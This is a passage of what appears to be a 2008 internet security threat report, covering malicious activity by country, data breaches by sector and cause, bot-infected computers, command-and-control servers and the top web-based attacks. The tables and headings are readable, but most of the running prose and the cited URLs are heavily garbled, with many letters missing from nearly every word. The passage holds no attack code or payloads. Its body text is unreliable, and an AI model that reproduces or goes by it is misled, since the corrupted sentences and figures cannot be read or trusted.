log h cou s xosd o alcous aack o coos, ad i uss Cha sd

o of h lsu ol ha uss a oh cou.36 Ol lsu acvs a also

call o lkl o clud acvs o ss ha a b vulabl o aacks. ths cluds socal

wokg wbss, ol gag ss, fous, blogs, ad ol shog ss. Dac ss, such as

fous, fo xal, a ags fo aacks usg bo-fcd cous o oaga ad hos

alcous co sc Wb alcao ad s-scfc vulabls ca u hs s of s a sk.

th slgh do Chas cag of alcous acv 2008 was al du o h do hshg

wbs hoss ad bo-fcd cous. Cha dod fo hd fo hshg wbs hoss 2007

o sxh 2008, wh jus ud 3 c of h global oal; ad, alhough Cha aad s o

akg fo bo-fcd cous, s global sha hs gad dcasd fo 19 c 2007 o

13 c 2008.

O ossbl caus fo h dcass a b aoal avs o block wbss oall os

suscbl o faud a ffo o cas ol scu fo uss ahad of h 2008 Bjg Olc

Gas. thousads of wbss w h shu dow o blacklsd as a of hs ffo, cludg a

31h://vocs.washgoos.co/scufx/2008/10/sa_volus_lu_af_a.hl32 h://val.sac.co/kgfo/s/oh_soucs/b-sa_of_sa_o_12-2008.-us.df33 h://www.sac.co/scu_sos/wu.js?docd=2007-062007-0946-9934 h://www.sac.co/scu_sos/wu.js?docd=2006-011309-5412-9935 h://www.sac.co/scu_sos/wu.js?docd=2008-021215-0628-9936 h://www.sglobal.co/_asss/fls/tnS_mak_rsach_Dgal_Wold_Dgal_Lf.df


19/110


19

subsaal ub of ssag fous,37 whch, as od vousl, a oula ags of aack fo

Wb alcao ad s-scfc vulabls. thus, a duco h ub of bo-fcd

cous should sul a cosodg do oh aack acv cagos, such as sa zobs,

bcaus hs a of assocad wh bo-fcd cous. Cha dod fo hd sa zobs

2007, wh 7 c of h woldwd oal, o fouh ad 6 c 2008.

Aoh faco ha a hav cobud o h low cag of bo-fcd cous Cha

2008 was ha a ulcsd i cafs h w also shu dow ad suvso was ghd

o h ag cafs o hl addss ol scu sks assocad wh h casual us of ublc

cous.38 publc cous d o b o suscbl o aacks bcaus of h sgfca aou

of vad affc o such cou als. publc cous a fqul usd b a ga va of

ol fo a dff acvs such as al, ol shog, ad gag. th va of usag ad

lklhood ha as uss a lss awa ofo cocd whscu aks such cous

aacv o aacks.

i 2008, Ga aga akd hd wh 6 c of all i-wd alcous acv, dow slghl

fo 7 c 2007. i boh as, Ga akd hghl sa zobs ad hosg hshgwbssacvs ha a of assocad wh bo woks. i 2008, Ga akd fouh fo bo

C&C svs, wh 5 c of h oal. ths hgh ub of bo C&C svs lkl dcas ha bos

a o Ga, whch would cobu o h hgh aou of ovall alcous acv

ogag h. Also, sa zobs a of focusd gos wh hgh boadbad ao ad

badwdh caac bcaus hs codos facla sdg ou lag aous of sa quckl.

i s asoabl o xc ha h Ud Sas, Cha ad Ga wll cou o ouak oh

cous hs asu as h hav do so fo h as sval os. Bod hs h,

howv, cous such as Bazl, tuk, polad, ida, ad russa a xcd o cou o cas

h sha of ovall alcous acv bcaus h all hav adl gowg i fasucus ad

gowg boadbad oulaos.39 Cous ha hav a lavl w ad gowg i fasucu

d o xc casg lvls of alcous acv ul scu oocols ad asus a

ovd o cou hs acvs.

Data breaches that could lead to identity theft, by sector

id hf cous o b a hgh-ofl scu ssu, aculal fo ogazaos ha so ad

aag lag aous of soal foao. Basd o h os c foao avalabl fo 2007,

oughl 8.4 llo U.S. sds w vcs of d hf, whch ss aoxal 3 c

of h adul oulao.40 no ol ca cooss ha sul h loss of soal daa ud

cuso ad suoal cofdc, sul cosl daag o a ogazaos uao, ad b

cosl fo dvduals o cov fo h sulg d hf, h ca also b facall cosl o

ogazaos. i 2008, h avag cos cd of a daa bach h Ud Sas was $6.7 llo,

a cas of 5 c fo 2007, ad los busss aoud o a avag of $4.6 llo.41 Also,

ogazaos ca b hld labl fo bachs ad losss, whch a sul fs o lgao.42

37 S h://www.vu.co/vu/ws/2207878/cha-cacks-wb-o ad h://glsh.gov.c/2008-03/29/co_931872.h38 h://www.hglobadal.co/svl/so/rtGAm.20080212.wgcha0212/BnSo/tcholog/ho39 h://www.o-oc.co40 h://www.vacghs.og/a/dhfsuvs.h#Jav200741 h://www.coos.co/dowload/poo_COB_2008_US_090201.df.42 h://www.fsa.gov.uk/ags/Lba/Coucao/pr/2007/021.shl


20/110


20

Usg ublcl avalabl daa, Sac has dd h scos ha w os of affcd b

hs bachs ad h os coo causs of daa loss.43 ths dscusso wll also xlo h sv

of h bach b asug h oal ub of ds xosd o aacks, usg h sa ublcl

avalabl daa.44

i should b od ha so scos a d o col wh o sg og qus fo

daa bachs ha ohs. Fo sac, gov ogazaos a o l kl o o daa bachs,

h du o gulao oblgaos o cojuco wh ublcl accssbl auds ad foac

os.45 Covsl, ogazaos ha l o cosu cofdc a b lss cld o o such

bachs fo fa of gav cosu, dus, o ak aco. As a sul, scos ha a o

qud o couagd o o daa bachs a b ud-sd hs daa s.

i 2008, h ducao sco sd h hghs ub of kow daa bachs ha could lad o

d hf, accoug fo 27 c of h oal (fgu 4). ths s a slgh cas fo 2007 wh h

ducao sco also akd fs wh 26 c of h oal.

4%5%

29%

20%

13%

6%

Data breaches Identities exposed

2%

10%

Health care

Education

Government

Financial

2%

2%

2%2%

20%

5%

14%

15%

Retail/wholesale

Arts/media

Manufacturing

27%

Telecom

Business consulting

Insurance

Other

Biotech/pharmaceutical

4%

17%

2%

Utilities/energy

Figure 4. Data breaches that could lead to identity theft by sector and identities exposed by sector 46

Source: Based on data provided by OSF DataLoss DB

43 O Scu Foudao (OSF) Daaloss DB, s h://daalossdb.og44 A d s cosdd o b xosd f soal o facal daa lad o h d s ad avalabl hough h daa bach.45 Cf. h://ww w.vacghs.og/fs/fs6a-faca.h ad h://www.cs.hhs.gov/HalhplasGifo/12_HipAA.as46 Du o oudg, cags gh o qual 100 c.


21/110


21

educaoal suos so a lag aou of soal foao o suds, facul, ad saff ha

could b usd fo h uoss of d hf, cludg gov-ssud dfcao ubs,

as, ad addsss. Fac das hs suos also so bak accou foao fo

aoll ad a also hold cd cad foao fo ol who us hs hod o a fo uo ad

fs. ths suosaculal lag uvssof coss of a auooous daswh whch ssv soal dfcao foao a b sod saa locaos ad b

accssbl o a ol. ths a cas h oous fo aacks o ga uauhozd accss

o hs daa sc a b o dffcul o sadadz h scu, duca vo wh accss o h

daa o h olcs, ad cool accss o hs dssd daabass.

Ds h hgh ub of daa bachs ha occud h ducao sco dug 2008, ol

accoud fo 4 c of all ds xosd dug h od ad akd svh (fgu 4). ths

a b bcaus h ducaoal suos hav lavl sall daabass ha hos of facal o

gov suos ad, hc, fw ds would b xosd a daa bach. O of h lags

uvss h Ud Sas accoud fo lss ha 80,000 suds ad los, whl facal

ad gov suos a so foao o llos of ol.47

Also, o-hd of h daa bachs h ducao sco hs od w causd b h hf o loss

of cous o daa-soag dvcs. As such, daa bachs ha occud h ducao sco

hs og od w o as lkl o sul wd-scal d hf bcaus h suld h

xosu of fw ds. ths s of bachs ol xos h ld aou of daa ha s

sod o h dvcs.

i 2008, h gov sco akd scod ad accoud fo 20 c of daa bachs ha could

lad o d hf. ths s a dcas fo h vous a, wh h gov sco sd

23 c of h oal, hough sll akg scod. ths d s focd b h aual Fdal Cou

Scu o cad, wh h ub of gov agcs wh a falg gad dcasd b alos

half.48 th halh ca sco akd hd 2008, accoug fo 15 c of daa bachs ha could

lad o d hf. i also akd hd 2007, accoug fo 14 c.

Gov ad halh ca ogazaos, lk ducaoal suos, so lag aous of foao

ha could b usd fo d hf. Sla o h ducao sco, hs ogazaos of coss of

uous auooous das ha so ssv soal foao saa locaos ad

a accssbl o uous ol. As a cosquc, hs ogazaos fac h sa scu ad

cool ssus as ducaoal suos. Fuho, halh ca ogazaos so ssv dcal

foao addo o soal foao, whch could sul v o daagg bachs

of vac.

th gov sco akd hd fo ds xosd dug 2008, accoug fo 17 c of

h oal whl h halh ca sco akd sxh, accoug fo 5 c of h oal. As wh h

ducao sco, daa bachs wh h halh ca sco suld a lavl low ub of

ds xosd.

47 h://www.osu.du/osuoda/sufo.h48 h://ublcas.ovsgh.hous.gov/da/pDFs/ros/Fy2007FiSmAroCad.df


22/110


22

Data breaches that could lead to identity theft, by cause

i 2008, h a caus of daa bachs ha could facla d hf was h hf o loss of

a cou o oh du o whch daa s sod o asd, such as a USB k o a back-u

du.49 thf o loss ad u 48 c of all daa bachs 2008, a dcas fo h

vous og od wh accoud fo 52 c of all od bachs (fgu 5).

Data breaches Identities exposed

Insider 4%

Unknown


23/110


23

to oc agas daa hf o loss, ogazaos should sc h us of ousd soal soag

dvcs wh h wok, oo h usag of such hadwa wh d, ad duca los

o o usag. Ogazaos should also clud vws ad auds of lcoc docus usd b

los uo lavg h coa. i a c sud, 59 c of los add o akg

coa foao, such as al addsss, coac foao of cusos, lo cods,ad facal cods, wh lavg h ogazao.52 Of hs fo los, 79 c ook h

foao whou cos fo h coa. i 92 c of h sacs, h foao was ak

o dsk, whl 73 c was o ovabl dvs. i s woh og ha ol 15 c of h coas

olld had coducd a vw o aud of lcoc docus ak b los. Also, ssv daa

should b sogl cd o a lao o soag dvc ha a b usd ousd of h s.

th scod os coo caus of daa bachs ha could lad o d hf dug 2008 was

scu olc, whch sd 21 c of all cds. A daa bach s cosdd o b causd

b scu olc f ca b abud o a falu o dvlo, l, ad/o col wh adqua

scu olc. i 2007, scu olc also akd scod, accoug fo 28 c of such daa

bachs. ths dcas h ub of daa bachs a b du o ogazaos bcog o

dlg ad oducg sog scu olcs such as lg accss o ssv foao o qud

sol ad h docuao of docu asfs. iscu olc accoud fo ol 8 c of

xosd ds 2008 ad, hus, ach bach xosd ol a lavl sall ub of ds.

Alhough bachs causd b scu olc 2008 w o lkl o sul wd-scal d hf,

h bachs sll xosd aoxal 6.5 llo ds.53

i 2008, hackg was h hd ladg caus of daa bachs ha could lad o d hf, accoug

fo 17 c of h oal. A daa bach s cosdd o b causd b hackg f daa lad o d

hf was xosd b aacks xal o a ogazao gag uauhozd accss o cous o

woks. Hackg also akd hd 2007, accoug fo 14 c of bachs ha could facla

d hf. Hackg s o uos-dv ha scu olc, hf, o loss: 2008, ov half of h

bachs ha xosd cd cad foao w du o hackg. Aacks ca ak advaag of s-scfc ad Wb-alcao vulabls o ga accss o woks ad sal soal foao. Fo

hs dscusso, Sac cosds hackg o b a oal ac wh a dfd uos o sal daa

ha ca b usd fo uoss of d hf o oh faud.

Hackg akd scod fo ds xosd 2008, wh 22 c; hs s a lag dcas fo 2007,

wh hackg accoud fo 62 c of oal ds xosd. th cobug faco fo s hgh

akg 2007 was a sgfca daa bach whch daa o ov 94 llo cd cads was sol b

aacks hackg o a coas daabas hough ucd wlss asssos ad sallg

ogas o cau cd cad foao.54 i s sad ha bw $63 llo ad $83 llo

cd cad faud acoss 13 cous ca b abud o hs sgl daa bach.55

i 2008, wo bachs cobud sgfcal o h hgh akg of hackg hs c: h

fs, cofdal foao o sx llo Chlas was llgall obad fo gov daabass

b a hack who ublcl osd h foao afwad; h scod, cd cad foao fo

4.2 llo cusos was sol fo a U.S.-basd goc cha b hacks oog h cd

52 h://www.sac.co/abou/ws/las/acl.js?d=20090223_0153 h://daalossdb.og54 h://www.sbc.s.co/d/21454847/55 h://www.scufocus.co/ws/11493


24/110


24

auhozao ocss.56 Bcaus of h ovao of aacks who us hackg o sal soal facal

foao, h ac of daa bachs du o hackg a sv bcaus h a lkl o sul

lag-scal faud ad hgh facal cos o affcd ogazaos, cd cad ssus, ad cosus.

ev hough h cosu o of h os challgg ssus facd b ogazaos, daa bachs

ha could lad o d hf a osl vabl. Fo a da ha aags o qus

accss o ssv foao, ogazaos should dvlo sog scu olcs such as sogl

cg all daa, sug h a cools lac ha scs accss o such foao o qud

sol, ad ovdg ducao ad soucs fo all los o o scu ocdus. nwok

adsaos should b closl oog wok affc ad ackg all acv o su ha h s

o llgal accss o daabass, as wll as sg scu ocsss ad sss gulal o su h

g. Ogazaos should clud hs ss as a of a boad scu olc, ad su ha a

scu olc s ld ad focd o oc all ssv daa fo uauhozd accss.

Bot-infected computers

Bos a ogas ha a covl salld o a uss ach od o allow a aack o ol

cool h agd ss hough a coucao chal, such as i la cha (irC), p2p, o

Http. ths chals allow h o aack o cool a lag ub of coosd cous ov

a sgl, labl chal a bo, whch ca h b usd o lauch coodad aacks.

Bos allow fo a wd ag of fucoal ad os ca b udad o assu w fucoal b

dowloadg w cod ad faus. Aacks ca us bos o fo a va of asks, such as sg u

dal-of-svc (DoS) aacks agas a ogazaos wbs, dsbug sa ad hshg aacks,

dsbug swa ad adwa, oagag alcous cod, ad havsg cofdal foao fo

coosd cous ha a b usd d hf, all of whch ca hav sous facal ad lgal

cosqucs. Bos a also xsv ad lavl as o oaga. i 2008, Sac obsvd

udgoud coo advss fo as ll as $0.04 bo. ths s uch cha ha 2007,wh $1 was h chas c advsd fo bos. Bo-fcd cous wh a dcalzd bo C&C

odl a favod b aacks bcaus h a dffcul o dsabl, ad os oal, ca b lucav

fo h coolls. i o xal, a bo ow asd nw Zalad add o ag $21,500

ov a wo-a sa fo hs acvs.57

A bo-fcd cou s cosdd acv o a gv da f cas ou a las o aack o ha da.

ths dos o hav o b couous; ah, a sgl such cou ca b acv o a ub of dff

das. A dsc bo-fcd cou s a dsc cou ha was acv a las oc dug h od.

i 2008, Sac obsvd a avag of 75,158 acv bo-fcd cous da (fgu 6), a

31 c cas fo 2007. Sac also obsvd 9,437,536 dsc bo-fcd cous

dug hs od, a 1 c cas fo 2007.

56 Cf. h://ws.bbc.co.uk/1/h/wold/acas/7395295.s o h://www.sbc.s.co/d/23678909/57 h://www.wold.co/scu/58670/bo-as-ss-hslf-x-bll-gas


25/110


25

Date

Activebot-infectedcomp

uters

Apr 4, 2007 Jul 4, 2007 Oct 3, 2007 Jan 2, 2008

0

20,000

40,000

60,000

80,000

100,000

120,000

Apr 2, 2008 Jul 2, 2008 Oct 1, 2008Jan 3, 2007

4 per. moving average

Median daily

active bots

Dec 31, 2008

Figure 6. Active bot-infected computers, by day

Source: Symantec

th dcas acv bo-fcd cous a h bgg of 2008 a b du o h duco

sz of h bo assocad wh h paco toja.58 th ub of bo-fcd cous h

bo was ducd o 5 c of s vous sad sz, fo 2 llo bo-fcd cous

o 100,000.59 i addo, as sad Malicious activity by country, h shudow of wo U.S.-basd

hosg coas sosbl fo hosg bo C&C svs fo a ub of ajo bos lkl cobud

o h dcas acv bo-fcd cous Sb ad novb 2008. Af h shudow

Sb, ajo bos, cludg Szb ad padx,60

w abl o fd ala hosg, whchsuld a cas bo-fcd cous back o -shudow lvls. Howv, h shudow

novb svl cld Szb ad Ozdok, ad as a cosquc, cog bos, cludg

padx, w abl o fll h vod.61

Alhough h ub of acv bo-fcd cous dcasd a h d of h a, s assud ha

bo ows wll sk ou w hoss o g h bos back ol, ad s xcd ha bo ubs

wll s aga 2009.62 O sul of all h acv 2008 s ha hs shows ha bos ca b cld

b dfg ad shug dow h bo C&C sv hoss, bu ha hs sag s dffcul o l

gv h vaous global hosg oos ha bo coolls hav a h dsosal.

58 Also kow as h So bo.59 h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 3260 h://www.sac.co/scu_sos/wu.js?docd=2007-042001-1448-9961 h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 252662 h://val.sac.co/kgfo/s/oh_soucs/b-sa_of_sa_o_12-2008.-us.df


26/110


26

Bot command-and-control servers

Sac acks h ub of bo C&C svs globall bcaus hs a wha bo ows us o

la coads o bo-fcd cous o h woks. Fo h fs , hs volu of h

Sac Global Internet Security Threat Report, bo C&C svs coolld ov Http a cludd hs

aalss alogsd irC bo C&C svs.63 ths chag asu was ad du o h d of

bo ows shfg awa fo adoal irC bo C&C coucao fawoks ad owad

aagg h bos hough Http bo C&C svs. i 2008, Sac dfd 15,197 dsc w

bo C&C svs (fgu 7), of whch 43 c w ov irC chals ad 57 c ov Http.

IRC 43%

HTTP 57%

Figure 7. Bot command-and-control servers, by type

Source: Symantec

Bo ows a ovg awa fo adoal irC-basd bos sc h a as o dc,

ack, fl, ad block ha bos basd o Http affc. Http coucaos ca b usd o dsgus

bo affc aog oh Wb affc od o ak dffcul o dsgush alcous affc fo

lga Http affc. (mos Http bo asssos a cd o avod dco.) to fl h

affc, ogazaos would hav o sc h cd Http affc ad df ad ov bo-lad

affc whl sll allowg lga affc o ass hough. Bcaus of hs, s v dffcul o o

ad dsabl a bo C&C sucu. i s also uasoabl o block Http affc sc ogazaos dd

o lga Http affc o coduc da-o-da busss. Bo ows hav also b swchg awa

fo usg p2p fo bo C&C sv coucaos bcaus such affc s o asl dcd du o h

os cas assso. moov, a ss ad oh ogazaos also block p2p

os o v such hgh-badwdh affc fo g h woks.

63 no cludd hs asu a bo C&C svs ov p2p oocols; also, as hs s h fs o whch Http bo C&C svs a cludd hs aalss,2007 coasos a uavalabl.


27/110


27

Sac also obsvd a avag of 42 w acv bo C&C svs da 2008, of whch 18 w

irC-basd ad 24 w Http (fgu 8). th h lags bos dfd b Sac 2008Szb,

rusock, ad padxa all Http-basd.

Date

Botcomand-and-controlservers

0

10

30

50

20

40

60

HTTP

IRC

3 per. moving average (HTTP)

3 per. moving average (IRC)

Apr 2, 2008 Jul 2, 2008 Oct 1, 2008Jan 2, 2008 Dec 31, 2008

Figure 8. Bot command-and-control servers, by day

Source: Symantec

th do w ad acv Http bo C&C svs Fbua 2008 s lkl du o bo C&C svs fo

a ajo Http-basd bo, Ozdok, gog offl fo 10 das dug ha oh.64 Also, h sgfca

ducos ha occud Sb ad novb 2008 a lkl du o h shudow of wo U.S.-basd iSps, as was od vousl hs dscusso. th Sb shudow suld a da

dcas acv assocad wh h Szb ad padx bos.65 As od, s assud ha

hs bos foud ala hosg, whch would xla h subsqu s acv.

th scod shudow novb suld a 30 c dcas ovall bo affc ad s

hough o hav svl wakd wo of h lags bos, Szb ad rusock.66 th sgfca do

w ad acv Http bo C&C svs novb a b bcaus o of hs iSps was allgdl hosg

a lag ub of bo C&C svs fo Szb ad rusock, ad bos w had-codd o coc o hs

svs.67 i was sad ha h Szb bo had 300,000 bos o o h shudow68 ad h

rusock bo had cludd ov 150,000 bos.69

64 h://www.scagazus.co/trACe-Sx-bos-ga-85-c-of-sa/acl/107603/65 h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 2566 h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 2667 h://val.sac.co/kgfo/s/oh_soucs/b-sa_of_sa_o_12-2008.-us.df68 h://kowldgxchag.chag.co/scu-bs/szb-bo-s-h-bggs-bu-dos-sz-a/69 h://www.scagazus.co/th-rusock-bo-sas-aga/acl/112940/


28/110


28

Top Web-based attacks

th wdsad dlo of Wb alcaos alog wh h ubqu of as-o-xlo Wb alcao

scu vulabls hav suld h valc of Wb-basd has. Aacks wag o ak

advaag of cl-sd vulabls o log d o acvl coos scfc woks o ga

accss o hos cous. isad, h a ow focusd o aackg ad coosg wbss

od o ou addoal, cl-sd aacks.

ths aack s ca b foud globall ad Sac dfs ach b a assocad dsc dco

sgau. mos aack s ag scfc vulabls o waksss Wb bowss o oh cl-

sd alcaos ha ocss co ogag fo h Wb. ths c wll assss h o dsc

Wb-basd aacks ogag fo coosd lga ss ad alcous ss ha hav b

cad o oall ag Wb uss.

th aacks dscussd ca volv socal gg o c a vc o vw a alcous wbs, bu

os aacks xlo usd hgh-affc wbss. Wh h us vss a coosd wbs, a ub

of aack hods a usd. malcous co fo h wbs ca dcl xlo a vulabl

h bows, a bows lug-, o a dsko alcao. A aack such as hs a qu v ll

aco aa fo h us vsg h s fo wh h aack ogas. i h cas of a dv-b

dowload, h aack wll occu whou a aco qud fo h us.70

Aacks also us alcous wbss fo cooss, such as sladg h us o dcl auhoz

a scfc cholog ha h dowloads alcous cod, o og h us o clck o a o-u o

ba ad. Aacks ca also dc all affc fo a lga wbs o a alcous wbs fo

whch h uss cou wll h b aackd. i all of hs s of Wb-basd aacks, h us s

uawa of h coos. Oc a aack has coosd a wbs ad jcd alcous co,

h o sh ca assvl aack vsos of h coosd s. ths of aack s v ffc fo

aacks bcaus h ol hav o coos o Wb ag od o affc ull uss. Wh a

us vss a coosd Wb ag, h aack s cad ou hough h uss bows.71 th aack wllh ag vulabls h bows slf o wll ag hd-a alcaos ha a acvad

b h bows.

All Wb-basd aack affc gos hough h Http o HttpS oocols. th bf of hs fo aacks

s ha s uasoabl o block hs oocols bcaus lga ogazaos dd o h fo

h da-o-da busss. i addo, flg a lag volu of Http affc would sgfcal slow

houghu affc. Http affc s also dffcul o fl wh uso dco/uso vo

sss (iDS/ipS) bcaus s dffcul o dsgush alcous affc fo lga affc, ad Http

affc ca b cd, hus ablg aacks o b obfuscad wh lga affc.

Aacks a o ol log aual hods o xlo hs ssus, bu h a also usg

auoad ools, such as noslo,72 o xlo cl-sd vulabls o a assv scal. Such oolks

a wdl avalabl ad ackagd so ha ol wh al chcal kowldg a abl o us

h ffcvl.

70 A dv-b dowload s a dowload ha occus whou a uss o kowldg o auhozao ad dos o qu us aco. tcall hs sa xcuabl fl.

71 Cf. Vulabl ds sco fo dscusso o cooss o wbss wh Wb-basd vulabls.72 h://www.couwold.co/aco/acl.do?coad=vwAclBasc&axoona=Scu&aclid=9115599&axooid=17&agnub=1


29/110


29

Aoh aaco of h Wb fo xloao s h ofuso of dac ss ha us Wb-basd

alcaos, such as fous, hoo-shag galls, blogs, ad ol shog alcaos. Dac

ss a ags fo aacks usg bo-fcd cous o oaga ad hos alcous

co sc Wb alcao ad s-scfc vulabls ca u hs s of s a sk.

Aacks a also scall aacd o lag, oula wbss wh usd uaos. ths s o ol

bcaus a succssful coos ca ach a ga ub of ol (who d o hav a h

us fo lga wbss ad a hus o suscbl o aack), bu, as od, a b dffcul

o block aacks o hs ss usg scu ools whou dsug lga affc.

ths dvlos ad ds dca ha Wb-basd has hav o ol bco wdsad, bu

ha h also hav casd sohscao ad sv. i acula, Sac has ocd ha

bos (such as Asox, whch was all usd fo hshg scas) a bg dsgd o scfcall

xlo coss-s scg vulabls ad jc alcous cod o coosd wbss.73

ma Wb-basd aacks xlo vulabls ha a cosdd du sv. ths as ha

h ca coos h accou of h cul loggd us bcaus h us dos o qu

adsav vlgs o u h affcd alcaos. Whl h dag of cl-sd vulabls

a b ld b bs accs, such as scg Wb alcaos o h adsav lvl, hs s

of uasoabl gv how gal Wb alcaos a o h dlv of co fo a bussss.

mdu-sv vulabls affcg cl o dsko alcaos a of suffc fo a aack

o ou succssful alcous aacks o sgl cls, as wll as a h s lvl.

i 2008, h o Wb-basd aack was assocad wh h mcosof i exlo ADODB.Sa

Objc Fl isallao Wakss,74 whch accoud fo 29 c of h oal globall (abl 3).

th wakss allows aacks o sall alcous fls o a vulabl cou wh a us vss

a wbs hosg a xlo. to ca ou hs aack, a aack us xlo aoh vulabl ha

basss i exlo scu sgs o allow h aack o xcu alcous fls salld b

h al scu wakss. ths ssu was ublshd o Augus 23, 2003, ad fxs hav b avalablsc Jul 2, 2004. Sc hs was h o Wb-basd aack 2008, hs a dca ha a

cous ug i exlo hav o b achd o udad ad a ug wh hs

xosd vulabl.

Rank

1

2

3

4

5

6

7

8

9

10

Web-based Attack

Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness

Acrobat PDF Suspicious File Download

ANI File Header Size Buffer Overflow

Adobe SWF Remote Code Executable

Microsoft Internet Explorer DHTML CreateControlRange Code Executable

SnapShot Viewer ActiveX File Download

Microsoft Internet Explorer XML Core Services XMLHTTP Buffer Overload

Quicktime RTSP URI Buffer Overload

AOL SuperBuddy ActiveX Code Executable

Microsoft Internet Explorer WebViewFolderIcon ActiveX Control Buffer Overflow

Percentage

30%

11%

7%

7%

6%

5%

4%

3%

3%

2%

Table 3. Top Web-based attacks

Source: Symantec

73 h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 3374 Cf. h://www.sac.co/busss/scu_sos/aacksgaus/dal.js?asd=50031 o h://www.scufocus.co/bd/10514


30/110


30

A lag ub of xlos ad alcous alcaos a dd o hs vulabl as a coo

wa of coosg cous, ad wh oh kow vulabls. thfo, h aou of

aack acv s lad o h cuulav ub of xlos, aack oolks, ad wos agg hs

vulabl as o ossbl as of coosg cous. i s also lkl ha h lag ak

sha of mcosof i exlo las a ol h oula of hs aack.75

Whl h vulablwas achd 2004, h a lkl sll ough uachd cous ha a affcd b hs

vulabl fo aacks o cou o bf fo s xloao.

th scod os coo Wb-basd aack 2008 was lad o alcous Adob Acoba pDF

acv,76 whch accoud fo 11 c of Wb-basd aacks. Scfcall, as o dowload

suscous pDF docus w obsvd. ths a dca as b aacks o dsbu alcous

pDF co o vcs va h Wb. th aack s o dcl lad o a scfc vulabl, alhough

h cos of h alcous fl would b dsgd o xlo a aba vulabl a alcao

ha ocsss , such as Adob Acoba rad. A succssful aack could ulal sul h

coos of h g ad scu of a affcd cou. ths aack s assud o b oula

o du h coo us ad dsbuo of pDF docus o h Wb. Also, bowss ca b s u o

auoacall d a pDF docu b dfaul. Scfc xlo acv lad o alcous pDF fls

was obsvd 2008.77

th Vulnerability Trends sco of hs o os ha h cag of lug- vulabls

affcg Adob Acoba rad coaso o h oal ub of bows lug- vulabls

casd o 4 c 2008 fo 1 c 2007. ths dosas ha Adob Acoba rad s

casgl agd b aacks. i addo, h aaac of h noslo oolk 2008 a hav

cobud o h oula of hs of aack as ha oolk s dsgd o xlo vulabls

pDF docus.78

i 2008, h hd os coo Wb-basd aack xlod h mcosof Wdows Us32.DLL Ani Fl

Had Hadlg Sack-Basd Buff Ovflow Vulabl,79 accoug fo 7 c of Wb-basd

aacks 2008. th Ani (aad cuso fl) hadl s a dfaul coo of h mcosof Wdows

oag ss ad s usd b a sgfca ub of wdl usd mcosof alcaos as wll as h

Wdows shll. if succssfull xlod, h vulabl allows a aack o xcu aba cod

bddd a alfod Ani fl ogag fo h Wb o oh soucs. ths vulabl was

ublshd o Jaua 11, 2005, ad fxs hav also b avalabl sc ha . exlo cod was

ublcl avalabl h followg da. As wh h mcosof i exlo ADODB.Sa Objc Fl

isallao Wakss, h oc of hs of aack dcas ha cous h go a

lkl o bg suffcl achd ad udad.

Vulabls such as hos dscussd h cou o ga a lag aou of obsvd aack

acv bcaus h ca b labl xlod. ths aks hs vulabls caddas fo

auoao. Ds h fac ha fxs a avalabl, as od, s lkl ha h a sll ough

uachd sss xsc ha hs aacks cou o jo succss. Wh aacks ov

succssful, h a of adod b a lag ub alcous cod vaas ad aack oolks. ths ca

cuulavl ca a lag aou of obsvd aack acv. i s also lkl ha old alcous cod

vaas cou o a o auoacall xlo hs vulabls as a as of oagao.

75 h://aksha.hslk.co/bows-ak-sha.asx?qd=0&q=100&qd=1&qc=3&qfa=y&qs=2008&q=276 h://www.sac.co/busss/scu_sos/aacksgaus/dal.js?asd=2315377 hs://fous2.sac.co/5/Vulabls-exlos/pdf-h-Wod-fo-exlos/ba-/305564#A14178 h://www.couwold.co/aco/acl.do?coad=vwAclBasc&axoona=Scu&aclid=9115599&axooid=17&agnub=279 Cf. h://www.sac.co/busss/scu_sos/aacksgaus/dal.js?asd=21719 o h://www.scufocus.co/bd/12233


31/110


31

Top countries of origin for Web-based attacks

ths c wll assss h o cous of og fo Wb-basd aacks agas uss 2008 b

dg h locao of cous fo whch h aacks occud. no ha aacks, od o

hd h acks, of dc uss hough o o o svs ha a b locad awh globall.

Oc a aack has coosd a lga wbs, uss who vs h wbs wll b aackd b

sval addoal as. O wa s hough a dv-b dowload, whch suls h sallao of

alcous cod whou h uss kowldg o cos. Aoh wa s o dc h us o aoh

wbs ha s usd o hos alcous cod. Ss ad svs hosg a va of alcous xlos ca

b foud woldwd. mull doas ca b assocad wh o coosd s, whch s usd o

xlo o o o scu vulabls affcd cl bowss.

i 2008, cous fo h Ud Sas w h ladg souc of Wb-basd aacks agas uss,

accoug fo 38 c of h oal (abl 4). th a a ub of facos ha ak h Ud Sas

h o cou of og fo Wb-basd aacks. ths akg a b du o h o ha half a llo

wbss ha w coosd ma 2008 wh alcous cod ha was hosd russa ad h

Ud Sas. Wb fous hosd b pHp-basd bull boad alcaos w xlod o jc

alcous JavaSc o fou co. ths fous would h fc vsos wh vaas of h Zlob

toja80 dsgusd as a vdo codc sall. th xlo chags bows ad DnS sgs o h fcd

cou ad abls addoal aacks, cludg ug h fcd cou o a zob.81 ths

aack follows h d of aacks sg alcous cod o lga hgh-affc wbss wh

uss a lkl o b o usg of h co, ah ha ag o lu uss o vs scall

dsgd alcous ss.

Rank

1

23

4

5

6

7

8

9

10

Country

United States

ChinaUkraine

Netherlands

Russia

United Kingdom

Canada

Japan

Latvia

France

Percentage

38%

13%12%

8%

5%

5%

3%

2%

1%

1%

Table 4. Top countries of origin for Web-based attacks

Source: Symantec

80 h://www.sac.co/scu_sos/wu.js?docd=2005-042316-2917-9981 h://www.chalgs.co.uk/2008/05/13/zlob_oja_fou_coos_aack/


32/110


32

i 2008, Cha akd as h scod cou of og fo Wb-basd aacks, wh 13 c of h

woldwd oal. th a aso fo h hgh ak of Cha 2008 s du o coosd wbss

lag o h 2008 Bjg Olc Gas. th gas w o of h lags vs of 2008 ad

aacks xlod h oula of h v h as o lu ad coos uss, as has

b s vousl wh oh ajo sog ad a vs.82

O xal s h rusockbo, whch s ou als wh lks o a ws o abou h gas. Uss w od o clck

a lk h al ad vs a s, whch h od h o dowload a ssg codc od o

lauch a vdo. Clckg o oba h codc acuall suld h sallao of a toja.

Aacks a hav also usd socal gg o lu uss o coosd wbss ud h gus

of bg assocad wh h 2008 Bjg Olc Gas, as aacks agas Chs-laguag wbss

casd sgfcal dug h gas.83 th x of hs aacks was gad, howv, b

avs o cas ol scu fo uss ahad of h Gas b shug dow o blacklsg

